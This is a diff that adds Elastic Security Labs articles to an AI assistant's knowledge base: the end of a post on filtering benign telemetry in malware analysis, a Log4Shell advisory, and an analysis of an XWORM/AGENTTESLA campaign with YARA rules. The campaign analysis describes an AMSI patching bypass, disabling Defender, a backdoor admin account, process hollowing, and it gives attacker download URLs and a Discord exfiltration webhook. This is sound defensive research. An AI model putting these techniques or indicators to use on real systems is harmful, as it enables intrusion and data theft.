+We now have a list of known benign fingerprints, which we will use within our enrich pipeline to filter our mixed dataset with. Our enrich pipeline will once again use a condition to differentiate between data sources. An overview of our enrich processors is displayed below.
+
+![Enrich ingest pipeline](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image8.jpg)
+
+Focusing on the auditd manager, we built an enrich processor using the condition field to check if the document's dataset is auditd_manager.auditd. If it matches, we reference the enrich policy we created for that dataset. Using the fingerprint field, we match and enrich incoming documents. If the fingerprint is known within the enrich indices we created, we add the "enrich_label" field with the fingerprint to the document. See the processor below.
+
+![Configuration example](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image7.png)
+
+Once a document originating from the auditd_manager.auditd dataset comes through, the enrich processor is executed, and this finally executes a [script processor](https://www.elastic.co/guide/en/elasticsearch/reference/current/script-processor.html). The script processor allows us to run inline or stored scripts on incoming documents. We leverage this functionality to read each document in the pipeline, check whether the “enrich_label” field was added; and if this is the case, we set a new boolean field called “known_benign” to true and remove the “enrich_label” and “enriched_fingerprint” fields. If the document does not contain the “enrich_label” field, we set “known\_benign” to false. This allows us to easily filter our mixed dataset in Kibana.
+
+![Script processor](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image3.jpg)
+
+When using the “test pipeline” feature by adding a document that contains the “enrich_label”, we can see that the “fingerprint” and the “known_benign” fields are set.
+
+![Testing the pipeline with a benign document](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image22.jpg)
+
+For documents that do not contain “enrich\_label”, just the fingerprint is set.
+
+Working with these enrich policies requires some setup, but once they are well structured they can truly filter out a lot of noise. Because doing this manually is a lot of work, we created some simple Python scripts to somewhat automate this process. We will go into more detail about how to automate the creation of these enrich policies, their execution, the creation of the enrich pipeline and more shortly.
+
+#### Ingest pipeline chaining
+
+The [pipeline ingest pipeline](https://www.elastic.co/guide/en/elasticsearch/reference/current/pipeline-processor.html) provides a way to chain multiple ingest pipelines. By chaining pipelines, we create a sequence of operations that collectively shapes the incoming data in the form that we want, facilitating our needs for data normalization, fingerprint calculation, and data enrichment.
+
+In our work with Detonate, we ended up creating two ingest pipelines. The first will process benign data, which consists of a normalization pipeline and a fingerprint calculation pipeline. The next will process malicious data, consisting of a normalization, fingerprint calculation, and enrichment pipeline. An example of this would be the following:
+
+![Pipeline ingest pipeline](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image15.jpg)
+
+With the pipelines in place, we need to ensure that they are actually being used when ingesting data. To accomplish this, we leverage component templates.
+
+### Component templates
+
+[Component templates](https://www.elastic.co/guide/en/elasticsearch/reference/current/indices-component-template.html) are reusable configurations that define the settings and mappings for specific types of Elasticsearch components. They provide a convenient way to define and manage consistent configurations across multiple components, simplifying the management and maintenance of resources.
+
+When you first start using any fleet integrations, you would notice that a lot of component templates are created by default. These are also tagged as "managed", meaning that you can't change the configuration.
+
+![Component template overview](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image24.png)
+
+In order to accommodate users that want to post process events that are ingested via the fleet managed agent, all index templates call out to a final component template whose name ends in `@custom`.
+
+![Custom component template overview](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image9.png)
+
+The settings you put in these components will never be changed by updates. In our use case, we use these templates to add a mapping for the enrichment fields. Most of the data that is ingested via the fleet and its integrations will go through an ingest pipeline. These pipelines will follow the same pattern in order to accommodate user customizations. Take for example the following ingest pipeline:
+
+![Example of fleet manager component template](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image23.jpg)
+
+We can see that it is managed by fleet and it is tied to a specific version (e.g. 8.8.0) of the integration. The processor will end by calling the `@custom` pipeline, and ignore it if it doesn't exist.
+
+We want to add our enrichment data to the documents using the enrichment pipelines we described in the previous section. This can now simply be done by creating the `@custom` pipeline and having that call out to the enrichment pipeline.
+
+![Example of the created custom ingest pipeline](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image5.jpg)
+
+### Automating the process
+
+In order to create the gsub processors, ingest pipelines, and enrich policies, we had to use three Python scripts. In the next section we will showcase these scripts. If you choose to integrate these scripts, remember that you will need to adjust them to match your own environment in order to make them work.
+
+#### Creating the gsub ingest pipelines
+
+In order to create a gsub pipeline that will replace the given random paths by static ones we used a Python [script](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/gsub_pipeline_json_object.py) that takes several fields and patterns as an input, and prints out a json object which can be used by the pipeline creation API.
+
+#### Create Custom Pipelines
+
+After setting up the gsub pipeline, we leveraged [a second Python script](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/custom_pipelines.py) that searches for all fleet managed configurations that call an @custom ingest pipeline. It will then create the appropriate pipeline, after which all the custom pipelines will be pointing to the `process_local_events` pipeline.
+
+#### Generate Enrichment Processors
+
+Finally, we created a [third](https://github.com/elastic/labs-releases/blob/main/tools/malware_research/enrich_policy_setup.py) Python script that will handle the creation of enrichment processors in four steps.
+
+1. `The cleanup process` : While an enrichment processor is used in an ingest pipeline it cannot be deleted. During testing and development we simply delete and recreate the ingest pipeline. This is of course not recommended for production environments. 
+2. `Create enrich policies` : The script will create every individual policy.
+3. `Execute the policies` : This will start the process of creating the hidden enrichment system index. Note that the execution of the policy will take longer than the execution of the script as it will not wait for the completion of the command. Elastic will create the enrichment index in the background.
+4. `Re-create the ingest pipeline` : After the enrich policy has been updated, we can now re-create the ingest pipeline that uses the enrichments. 
+
+After executing these three scripts, the whole setup is completed, and malicious data can be ingested into the correct namespace.
+
+### Results and limitations
+
+Our benign dataset includes 53,267,892 documents generated by executing trusted binaries on a variety of operating systems and collecting events from high-value data sources. Using this normalized benign dataset, we calculated the fingerprints and created the enrich policies per data type.
+
+With this setup in place, we detonated 332 samples. After removing the Elastic agent metrics and endpoint alerts from the datasets, we ended up with a mixed dataset containing a total number of 41,710,279 documents.
+
+![Results prior to filtering on known_benign = false](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image17.jpg)
+
+After setting “known\_benign” to false, we end up with 1,321,949 documents. This is a decrease of 96.83% in document count.
+
+![Results after filtering on known_benign = false](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image4.png)
+
+The table below presents an overview of each data source and its corresponding number of documents before and after filtering on our “known\_benign” field.
+
+![Results of filtering out benign data](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/Screenshot_2023-07-27_at_11.08.25_AM.jpg)
+
+We can see that we managed to successfully filter most data sources by a decent percentage. Additionally, the numbers presented in the “after” column include malicious data that we do want to capture. For example, amongst the different malware samples several included ransomware - which tends to create a lot of file events. Also, all of the http traffic originated from malware samples trying to connect to their C2’s. The auditd\_manager and fim.event datasets include a lot of the syscalls and file changes performed by the samples.
+
+While building out this pipeline, several lessons were learnt. First of all, as mentioned before, if you add one wrong field to the fingerprint calculation the whole dataset might end up generating lots of noise. This can be seen by adding the source.port to the packetbeat fingerprint calculation, resulting in the endpoint.events.network and all network\_traffic-\* datasets to increase drastically.
+
+The second lesson we learned: it is not only important to have a representative dataset, but it is also important to have a large dataset. These two go hand in hand, but we learnt that having a small dataset or a dataset that does not generate very similar behavior to the dataset that will be ingested later, will cause the pipelines to be less than half as effective.
+
+Finally, some data sources are better suited for this filtering approach than others. For example, when dealing with `system.syslog` and `system.auth` events, most of the fields within the document (except the message field) are always the same. As we cannot use this approach for unstructured data, such as plain text fields, our filter would filter out 99% of the events when just looking at the remaining fields.
+
+### Visualizing results
+
+Kibana offers many great options to visualize large datasets. We chose to leverage the Lens functionality within Kibana to search through our malicious dataset. By setting `known\_benign` to false, setting `count of fingerprint` as a metric, and sorting by ascending order, we can right away see different malware samples execute different tasks. Examples of file events is shown below.
+
+![Using Lens to visualize malicious file events](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image2.png)
+
+Within this table, we can see - suspicious files being created in the `/dev/shm/` directory - “ `HOW_TO_DECRYPT.txt` ” file creations indicating the creation of a ransom message - Files being changed to contain new random file extensions, indicating the ransomware encryption process.
+
+When looking into file integrity monitoring events, we can also very easily distinguish benign events from malicious events by applying the same filter.
+
+![Using Lens to visualize malicious symlink events](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image10.jpg)
+
+Right away we notice the creation of a symlink for a `linux.service` and `bot.service` , and several run control symlinks to establish persistence onto the system.
+
+Looking at network connections, we can see `connection\_attempted` events from malicious samples to potential C2 servers on several uncommon ports.
+
+![Using Lens to visualize malicious network connections](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image19.jpg)
+
+Finally, looking at auditd manager syscall events, we can see the malware opening files such as cmdline and maps and attempting to change the permissions of several files.
+
+![Using Lens to visualize malicious syscalls](/assets/images/an-elastic-approach-to-large-scale-dynamic-malware-analysis/image11.png)
+
+Overall, in our opinion the data cleaning results are very promising and allow us to more efficiently conduct dynamic malware analysis on a large scale. The process can always be further optimized, so feel free to take advantage of our approach and fine tune it to your specific needs.
+
+## Beyond Dynamic Malware Analysis
+
+In the previous sections we described our exact use case for leveraging fingerprint and enrich ingest pipelines. Other than malware analysis, there are many other fields that can reap the benefits of a workflow similar to the one outlined above. Several of these applications and use cases are described below:
+
+- Forensics and Security: Fingerprinting can be employed in digital forensics and security investigations to identify and link related artifacts or events. It helps in tracing the origin of data, analyzing patterns, and identifying potential threats or anomalies in log files, network traffic, or system events. Researchers over at Microsoft leveraged fuzzy hashing in [previous research](https://techcommunity.microsoft.com/t5/microsoft-security-experts-blog/fuzzy-hashing-logs-to-find-malicious-activity/ba-p/3786669) to detect malicious web shell traffic. 
+- Identity Resolution: Fingerprinting can be used to uniquely identify individuals or entities across different data sources. This is useful in applications like fraud detection, customer relationship management, and data integration, where matching and merging records based on unique identifiers is crucial.
+- Data Deduplication: Fingerprinting can help identify and eliminate duplicate records or documents within a dataset. By comparing fingerprints, you can efficiently detect and remove duplicate entries, ensuring data integrity and improving storage efficiency. Readers interested in data deduplication use cases might find great value in pre-built tools such as [Logslash](https://blog.foxio.io/introducing-logslash-and-the-end-of-traditional-logging-2c6708b6fc1c) to achieve this goal.
+- Content Management: Fingerprinting can be used in content management systems to detect duplicate or similar documents, images, or media files. It aids in content deduplication, similarity matching, and content-based searching by improving search accuracy and enhancing the overall user experience.
+- Media Identification: Fingerprinting techniques are widely used in media identification and recognition systems. By generating unique fingerprints for audio or video content, it becomes possible to identify copyrighted material, detect plagiarism, or enable content recommendation systems based on media similarity.
+
+## Conclusion
+
+There are many different approaches to dynamic malware analysis. This blog post explored some of these options by leveraging the powerful capabilities offered by Elastic. Our aim was to both present a new method of dynamic malware analysis while at the same time broadening your understanding and knowledge of the built-in functionalities within Elastic.
+
+Elastic Security Labs is the threat intelligence branch of Elastic Security dedicated to creating positive change in the threat landscape. Elastic Security Labs provides publicly available research on emerging threats with an analysis of strategic, operational, and tactical adversary objectives, then integrates that research with the built-in detection and response capabilities of Elastic Security.
+
+Follow Elastic Security Labs on Twitter @elasticseclabs and check out our research at [www.elastic.co/security-labs/](http://www.elastic.co/security-labs/).
+
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/analysis_of_log4shell_cve_2021_45046.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/analysis_of_log4shell_cve_2021_45046.md
new file mode 100644
index 0000000000000..d9d8a93aa9720
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/analysis_of_log4shell_cve_2021_45046.md
@@ -0,0 +1,66 @@
+---
+title: "Analysis of Log4Shell vulnerability & CVE-2021-45046"
+slug: "analysis-of-log4shell-cve-2021-45046"
+date: "2022-11-30"
+description: "In this post, we cover next steps the Elastic Security team is taking for users to continue to protect themselves against CVE-2021-44228, or Log4Shell."
+author:
+  - slug: jake-king
+image: "photo-edited-12-e.jpg"
+category:
+  - slug: security-research
+  - slug: vulnerability-updates
+---
+
+> _To understand how Elastic is currently assessing internal risk of this vulnerability in our products please see the advisory_[_here._](https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476)
+>
+> _This document was updated on December 17, 2021 to reflect a revised CVSS score for CVE-2021-45046, and new findings by the community._
+
+In recent days Log4Shell, or CVE-2021-44228, has dominated the news cycle in the world of information security and beyond. Elastic released an [advisory](https://discuss.elastic.co/t/apache-log4j2-remote-code-execution-rce-vulnerability-cve-2021-44228-esa-2021-31/291476?ultron=log4js-exploit&blade=announcement&hulk=email&mkt_tok=ODEzLU1BTS0zOTIAAAGBU8N1ZUOwzTcRbJCOiByHmeYiopMnarq-QPWBIyhPI3Vvsp6w-4q4PBbTGZ3fZ0sB75cpaUdOddA1k-6-yh3QwAicvJTgafdJWv_-9Cn2GoKLvsmt) detailing how Elastic products and users are impacted, and a [blog](https://www.elastic.co/blog/detecting-log4j2-with-elastic-security?ultron=log4js-exploit&blade=announcement&hulk=email&mkt_tok=ODEzLU1BTS0zOTIAAAGBU8N1ZDYRbFq2QZ4ZK8tc2IbDatArsdI6WGcA2M90g4v02svJeqCXFeZ23R4TjeYii4KBGAkqMBgWc5IkxYrmefgwZBanjGQh8v66drUymiVSQFvs) post describing how our users can leverage Elastic Security to help defend their networks.
+
+Many readers have further questions as to how we’re tracking this issue within Elastic Security, what our coverage is now, and what we’re expecting to do next. This post outlines a few details for our current status, and provides details regarding a new, related vulnerability: CVE-2021-45046.
+
+## Elastic Security response
+
+As you may imagine, the team has worked tirelessly to ensure that we’re developing detections for both active exploitation of the vulnerability, as well as post-compromise indicators, and will continue active development until further notice.
+
+We’re spending time focusing on detailed detections that better align with some of the emerging trends that adversaries are now taking advantage of as they have time to develop their attack strategies. And we’re not working in silence — those that may have had a chance to catch up on our [original post](https://www.elastic.co/blog/detecting-log4j2-with-elastic-security) a few days ago will be pleasantly surprised we’ve added further detections and hunting examples, and will continue to do so as we learn more with the community.
+
+Alongside the threat research and signature development, we’ve noted some interesting observations:
+
+- We noted several instances of [generic crypto miners](https://www.virustotal.com/gui/file/5b25db204b5cd5cc3193f4378dd270dced80da9d39874d8b6fdd75e97d2cc907/detection) for Linux being deployed that appeared to be related to exploitation of this CVE, but determined that they are benign true positives
+- We’ve stopped at least eight different families of malware being deployed using the log4j exploit, indicating widespread adoption of the exploit by threats of all kinds
+- While we are observing coverage across our full protection suite (such as behavior protection), it is noteworthy that our free basic-tier malware protection is successfully preventing initial access
+
+We will aim to keep users and readers apprised of findings, and hope to share additional observations in the wild as we see them.
+
+## A new contender: CVE-2021-45046
+
+While we watch the CVE-2021-44228 (Log4Shell) vulnerability dominate the news cycles, a new contender, [CVE-2021-45046](https://nvd.nist.gov/vuln/detail/CVE-2021-45046), was accidentally introduced to Log4j2j version 2.15.0, allowing adversaries to invoke a Denial of Service, and a remote code execution condition through specially crafted payloads. Previous mitigations to avoid Information Disclosure vulnerabilities by setting the `log4j2.noFormatMsgLookup` state to `true` do not mitigate against this new finding, according to the CVE details.
+
+While initially CVE-2021-45046 carried a lower CVSS score of 3.7 due to the impact of the initially discovered condition that can be invoked, this was re-evaluated to a 9.0 indicating limited remote code execution was possible. The finding was shared on December 16, 2021 by [Alvaro Muñoz](https://twitter.com/pwntester/status/1471465662975561734), who identified that while the default setting formatMsgNoLookups was accurately set to true, there were alternative locations for lookups to take place. Technical details are still unfolding from the community, however the Log4j2 team shared the following message within their security updates:
+
+_The reason these measures are insufficient is that, in addition to the Thread Context attack vector mentioned above, there are still code paths in Log4j where message lookups could occur: known examples are applications that use Logger.printf("%s", userInput), or applications that use a custom message factory, where the resulting messages do not implement StringBuilderFormattable. There may be other attack vectors._
+
+_The safest thing to do is to upgrade Log4j to a safe version, or remove the JndiLookup class from the log4j-core jar._ [_Reference here_](https://logging.apache.org/log4j/2.x/security.html)
+
+Given this new information, and readily available[POCs](https://twitter.com/marcioalm/status/1471740771581652995) available for exploitation, the Apache team has recommended those impacted upgrade to the latest, safe version of Log4j2, or alternatively remove the JndiLookup class from the log4j-core jar.
+
+Elastic Security has observed many threat actors and benign scanners leveraging this new methodology already in some edge environments, with payloads incorporating previous attack methodologies such as key extraction attempts and base64 encoded payloads:
+
+![A preview of the rapid acceleration of scanning attempts adopting this new vulnerability](/assets/images/analysis-of-log4shell-cve-2021-45046/scanning-attempts-vulnerability.jpg)
+
+We anticipate adding further details as we learn them, and thank the team at lunasec specifically for providing a [detailed, early summary](https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/) of this emerging situation, and of course, provide kudos to [Alvaro Muñoz](https://twitter.com/pwntester) of Github Security Lab for the findings.
+
+## Thank you (again!), from Elastic Security
+
+We want to thank all of the security teams across the globe for your tireless work this week. As we referenced before, openness and collaboration in the security community to safeguard all users is paramount when facing such a serious and pervasive vulnerability.
+
+Existing Elastic Security users can access these capabilities within the product. If you’re new to Elastic Security, take a look at our [Quick Start guides](https://www.elastic.co/training/elastic-security-quick-start) (bite-sized training videos to get you started quickly) or our [free fundamentals training courses](https://www.elastic.co/training/free#fundamentals).
+
+Get started with a [free 14-day trial of Elastic Cloud](https://cloud.elastic.co/registration). Or [download](https://www.elastic.co/downloads/) the self-managed version of the Elastic Stack for free.
+
+### References
+
+[https://logging.apache.org/log4j/2.x/security.html](https://logging.apache.org/log4j/2.x/security.html)
+
+[https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/](https://www.lunasec.io/docs/blog/log4j-zero-day-severity-of-cve-2021-45046-increased/)
diff --git a/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/attack_chain_leads_to_xworm_and_agenttesla.md b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/attack_chain_leads_to_xworm_and_agenttesla.md
new file mode 100644
index 0000000000000..920df028a2376
--- /dev/null
+++ b/x-pack/plugins/elastic_assistant/server/knowledge_base/security_labs/attack_chain_leads_to_xworm_and_agenttesla.md
@@ -0,0 +1,224 @@
+---
+title: "Attack chain leads to XWORM and AGENTTESLA"
+slug: "attack-chain-leads-to-xworm-and-agenttesla"
+date: "2023-04-10"
+description: "Our team has recently observed a new malware campaign that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into clicking on the documents, which appear to be legitimate."
+author:
+  - slug: salim-bitam
+image: "blog-thumb-coin-stacks.jpg"
+category:
+  - slug: attack-pattern
+  - slug: malware-analysis
+tags:
+  - xworm
+  - agenttesla
+---
+
+## Key Takeaways
+
+- Threat actors are deploying known malware using their own custom .NET loaders
+- The threat actors employ simple and well-known tactics such as bypassing AMSI through patching and a basic custom .NET loader
+- The threat actors are abusing legitimate free file hosting services
+
+## Preamble
+
+Our team has recently observed a new malware campaign that employs a well-developed process with multiple stages. The campaign is designed to trick unsuspecting users into clicking on the documents, which appear to be legitimate, but are in fact fake, the adversary leverages weaponized word documents to execute malicious PowerShell scripts, and also utilizes a custom obfuscated .NET loader to load various malware strains, including XWORM and AGENTTESLA.
+
+## RTF loader code analysis
+
+### Overview
+
+During a recent investigation, we discovered a malicious word document named `Card & Booking Details.docx`. This document has been designed with the intent to deceive the victim and includes two falsified scanned documents, namely a credit card and a passport.
+
+Upon opening the document, an RTF object hosted at `www.mediafire[.]com/file/79jzbqigitjp2v2/p2.rtf` is fetched.
+
+This RTF object contains a macro-enabled Excel object. When opened, this macro downloads an obfuscated powerShell script which in turn deploys different malware families.
+
+At the time of this writing, we have observed two distinct malware families, namely XWORM and AGENTTESLA, have been deployed through this execution chain. Both malware families mentioned above are loaded into the compromised system's memory by the same custom .NET loader. Once loaded, the malicious payload can carry out a range of functions, such as stealing sensitive data and executing commands on the compromised system.
+
+![Execution flow diagram](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image8.png)
+
+In this research post, we will walk through the initial execution of the malware and detail the capabilities we discovered.
+
+### Extracting the malicious VBA
+
+The RTF document contains multiple embedded objects, including an interesting one that caught our attention: `Excel.SheetMacroEnabled`.
+
+![Listing objects embedded in the RTF document](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image1.jpg)
+
+We can use [`rtfdumpy.py`](https://github.com/DidierStevens/DidierStevensSuite/blob/master/rtfdump.py), a script developed by Didier Stevens to analyze RTF files, to dump the object and [`olevba.py`](https://www.decalage.info/python/olevba), a script developed by Philippe Lagadec, to extract any embedded VBA scripts from an [OLE](https://en.wikipedia.org/wiki/Object_Linking_and_Embedding) object. The extracted VBA script shown below downloads and executes a malicious powershell script from `https://www.mediafire[.]com/file/xnqxmqlcj51501d/7000m.txt/file`.
+
+![Extracting the VBA script from the Excel sheet object](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image2.png)
+
+### Powershell script analysis
+
+The malicious PowerShell script is obfuscated using string substitution to evade detection and make analysis more difficult.
+
+![Powershell script obfuscated using string substitution](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image13.png)
+
+It contains additional powershell script blocks in hex format that will be deployed in the infected machine designed to prepare the environment by setting up persistence, bypassing AMSI, disabling Windows defender and creating a mechanism to update the malware. The ultimate objective is to install two .NET binaries, namely a loader and a payload (XWORM / AGENTTESLA).
+
+### Deleting the malicious document
+
+The malware starts by deleting the original Word document, first killing the process `Winword.exe` and then deleting all .DOCX files located in the default `Downloads` and `Desktop` folders of every user. This initial step shows the malware's destructive nature and how it can potentially harm the user's data.
+
+![Powershell command to delete the malicious word document](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image5.jpg)
+
+### Persistence
+
+The malware creates a directory in the path `C:\ProgramData\MinMinons` , which is used to store other Powershell scripts and binaries. The currently running Powershell script is then copied to `C:\ProgramData\MinMinons\Candlegraphy.\_\_\_`.
+
+Next, the malware deobfuscates the first embedded Powershell script which is used to create persistence. It first writes a JScript file that invokes the original Powershell script saved in `C:\ProgramData\MinMinons\Candlegraphy.\_\_\_` through the activeXObject shell, then a scheduled task named “MOperaChrome” is created to run the JScript file using the Microsoft signed [Windows Script Host (WSH) utility](https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wscript), `wscript.exe`.
+
+![Persistence through task scheduling](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image10.jpg)
+
+### AMSI bypass
+
+The second embedded powershell script is responsible for bypassing AMSI by patching the `amsiInitFailed` flag. In doing so, the initialization of AMSI fails, leading to the prevention of any scan being initiated for the ongoing process. Furthermore, the PowerShell script proceeds to disable the Microsoft Windows Defender service.
+
+![Disabling WinDefend service](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image5.jpg)
+
+### User creation
+
+The script creates a local administrator account named “System32” and adds it to the Remote Desktop Users group. This enables the attacker to log in via Remote Desktop Protocol (RDP). Next, the script disables the machine's firewall to allow inbound RDP connection attempts which aren’t filtered by edge controls.
+
+![Creating a backdoor user](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image9.jpg)
+
+### Malware update persistence
+
+The third embedded script stores a secondary JScript file, whose purpose is downloading a revised or updated version of the malware. This file is saved to a predetermined location at `C:\ProgramData\MinMinons\miguan.js`. Furthermore, a scheduled task with the name (“miguaned”) is created to execute the JScript file through `wscript.exe` , similar to the previously described task.
+
+The JScript creates an instance of `WScript.Shell` object by calling ActiveXObject with the following CLSID `{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}` which corresponds to Shell Object, then downloads from the URL `https://billielishhui.blogspot[.]com/atom.xml` the update powershell malware.
+
+![JScript script used for updating the malware](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image4.jpg)
+
+### .NET loader
+
+The custom DOTNET loader employs the [P/INVOKE technique](https://learn.microsoft.com/en-us/dotnet/standard/native-interop/pinvoke) to call the native Windows API and inject a payload into a signed microsoft binary via [process hollowing](https://attack.mitre.org/techniques/T1055/012/).
+
+The loader’s code employs various obfuscation techniques to hinder analysis, including the use of dead instruction, renamed symbols to make the code less readable and more confusion and encoded strings. Fortunately a tool like [de4dot](https://github.com/de4dot/de4dot) can be used to output a human-readable version of it.
+
+![.NET loader code obfuscation](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image12.jpg)
+
+The malware leverages the `LoadLibrary` and `GetProcAddress` APIs to access the required Windows APIs. To obscure the names of these APIs, the loader stores them in an encoded format within the binary file, utilizing a sequence of substitution and string reversal methods.
+
+![.NET loader string obfuscation](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image3.jpg)
+
+The loader then starts a process in a suspended state using `CreateProcessA` API. The following is the list of executables it uses as a host for it’s malicious code:
+
+- `C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe`
+- `C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe`
+- `C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe`
+
+These binaries are signed and trusted by the system and can evade detection by security software that relies on whitelisting system processes. It then uses `Zwunmapviewofsection` to unmap the memory of the target process, writes the payload to the suspended process and then resume the thread using `ResumeThread` API.
+
+### Final payload
+
+During our research we discovered that the threat actor has been deploying different payloads. Namely, we observed 2 families: XWORM and AGENTTESLA.
+
+XWORM has gained notoriety in the underground criminal marketplace due to its ability to employ sophisticated capabilities like virtualization and sandbox detection, used to avoid detection and support persistence within an infected system.
+
+Of particular concern is the fact that XWORM is readily available on the internet as a cracked version, with version 2.1 being especially prevalent. This highlights the dangers of underground cybercrime markets and the ease with which malicious actors can access and utilize powerful tools.
+
+Two different versions of the XWORM family were observed versions 2.2 and 3.1. The following is the configuration of a XWORM sample in plain text.
+
+![XWorm configuration](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image14.jpg)
+
+AGENTTESLA is a trojan and credential stealer written in .NET. While it first emerged in 2014, it is now among the most active and malicious software. AGENTTESLA is affordably priced and includes support from the developers, making it easily accessible to cybercriminals with limited technical skills.
+
+The sample we analyzed was heavily obfuscated, masqueraded as an AVG installer,and leverages discord for C2. It uploads stolen information to the attacker’s Discord channel via the following webhook: `https://discord[.]com/api/webhooks/1089956337733087274/uYNA_D8Ns1z9NZ3B1mGp0XXyGq-785KLGIfEAZsrz3TJd5fvOjXA927F7bUTTzbNT6Zk`.
+
+![Agent Tesla masquerading as an AVG installer](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image6.jpg)
+
+![The discord webhook extracted dynamically](/assets/images/attack-chain-leads-to-xworm-and-agenttesla/image7.png)
+
+## Observed adversary tactics and techniques
+
+Elastic uses the MITRE ATT&CK framework to document common tactics, techniques, and procedures that threats use.
+
+## Tactics
+
+Tactics represent the “why” of a technique or sub-technique. They represent the adversary’s tactical goals: the reason for performing an action.
+
+- [Initial access](https://attack.mitre.org/tactics/TA0001)
+- [Execution](https://attack.mitre.org/tactics/TA0002)
+- [Persistence](https://attack.mitre.org/tactics/TA0003)
+- [Command and control](https://attack.mitre.org/tactics/TA0011)
+- [Defense evasion](https://attack.mitre.org/tactics/TA0005)
+
+## Techniques/subtechniques
+
+Techniques and Subtechniques represent how an adversary achieves a tactical goal by performing an action.
+
+- [Process injection](https://attack.mitre.org/techniques/T1055/)
+- [Indicator removal: File deletion](https://attack.mitre.org/techniques/T1070/004/)
+- [Scheduled task/job: Scheduled task](https://attack.mitre.org/techniques/T1053/005/)
+- [User Execution: Malicious File](https://attack.mitre.org/techniques/T1204/002/)
+- [Phishing: Spearphishing Attachment](https://attack.mitre.org/techniques/T1566/001/)
+- [Command and Scripting Interpreter: Powershell](https://attack.mitre.org/techniques/T1059/003/)
+- [Obfuscated Files or Information](https://attack.mitre.org/techniques/T1027/)
+- [Impair Defenses: Disable or Modify Tools](https://attack.mitre.org/techniques/T1629/003/)
+- [Create Account](https://attack.mitre.org/techniques/T1136/)
+
+## Detection logic
+
+### YARA
+
+Elastic Security has created YARA rules to identify this activity. Below are YARA rules to identify XWORM and [AGENTTESLA](https://github.com/elastic/protections-artifacts/blob/main/yara/rules/Windows_Trojan_AgentTesla.yar) malware families.
+
+```
+rule Windows_Trojan_Xworm_732e6c12 {
+meta:
+    author = "Elastic Security"
+    id = "732e6c12-9ee0-4d04-a6e4-9eef874e2716"
+    fingerprint = "afbef8e590105e16bbd87bd726f4a3391cd6a4489f7a4255ba78a3af761ad2f0"
+    creation_date = "2023-04-03"
+    last_modified = "2023-04-03"
+    os = "Windows"
+    arch = "x86"
+    category_type = "Trojan"
+    family = "Xworm"
+    threat_name = "Windows.Trojan.Xworm"
+    source = "Manual"
+    maturity = "Diagnostic"
+    reference_sample = "bf5ea8d5fd573abb86de0f27e64df194e7f9efbaadd5063dee8ff9c5c3baeaa2"
+    scan_type = "File, Memory"
+    severity = 100
+
+strings:
+    $str1 = "startsp" ascii wide fullword
+    $str2 = "injRun" ascii wide fullword
+    $str3 = "getinfo" ascii wide fullword
+    $str4 = "Xinfo" ascii wide fullword
+    $str5 = "openhide" ascii wide fullword
+    $str6 = "WScript.Shell" ascii wide fullword
+    $str7 = "hidefolderfile" ascii wide fullword
+condition:
+    all of them}
+
+rule Windows_Trojan_AgentTesla_d3ac2b2f {
+meta:
+    author = "Elastic Security"
+    id = "d3ac2b2f-14fc-4851-8a57-41032e386aeb"
+    fingerprint = "cbbb56fe6cd7277ae9595a10e05e2ce535a4e6bf205810be0bbce3a883b6f8bc"
+    creation_date = "2021-03-22"
+    last_modified = "2022-06-20"
+    os = "Windows"
+    arch = "x86"
+    category_type = "Trojan"
+    family = "AgentTesla"
+    threat_name = "Windows.Trojan.AgentTesla"
+    source = "Manual"
+    maturity = "Diagnostic, Production"
+    reference_sample = "65463161760af7ab85f5c475a0f7b1581234a1e714a2c5a555783bdd203f85f4"
+    scan_type = "File, Memory"
+    severity = 100
+
+strings:
+    $a1 = "GetMozillaFromLogins" ascii fullword
+    $a2 = "AccountConfiguration+username" wide fullword
+    $a3 = "MailAccountConfiguration" ascii fullword
+    $a4 = "KillTorProcess" ascii fullword
+    $a5 = "SmtpAccountConfiguration" ascii fullword
